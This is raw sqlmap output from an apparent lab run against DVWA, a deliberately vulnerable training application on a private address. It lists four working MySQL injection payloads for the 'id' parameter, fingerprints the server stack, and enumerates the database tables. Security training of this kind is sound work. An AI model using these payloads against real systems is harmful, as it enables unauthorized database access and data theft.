        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.9.4#stable}
|_ -| . ["]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 05:25:19 /2025-06-30/

[05:25:19] [INFO] resuming back-end DBMS 'mysql' 
[05:25:19] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: id=(SELECT (CASE WHEN (7406=7406) THEN 1 ELSE (SELECT 1864 UNION SELECT 1238) END))&Submit=Submit

    Type: error-based
    Title: MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1 AND ROW(2484,1884)>(SELECT COUNT(*),CONCAT(0x7162627171,(SELECT (ELT(2484=2484,1))),0x716b6a7a71,FLOOR(RAND(0)*2))x FROM (SELECT 2008 UNION SELECT 3074 UNION SELECT 3727 UNION SELECT 2343)a GROUP BY x)&Submit=Submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1 AND (SELECT 5779 FROM (SELECT(SLEEP(5)))yOIm)&Submit=Submit

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: id=1 UNION ALL SELECT CONCAT(0x7162627171,0x4c5a4e596d5577597a4b6a5159456258524b58766143746a6f63776f74725770764d447251495779,0x716b6a7a71),NULL-- -&Submit=Submit
---
[05:25:19] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 4.1
[05:25:19] [INFO] fetching tables for database: 'dvwa'
[05:25:19] [WARNING] reflective value(s) found and filtering out
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users     |
+-----------+

[05:25:19] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.0.11'

[*] ending @ 05:25:19 /2025-06-30/

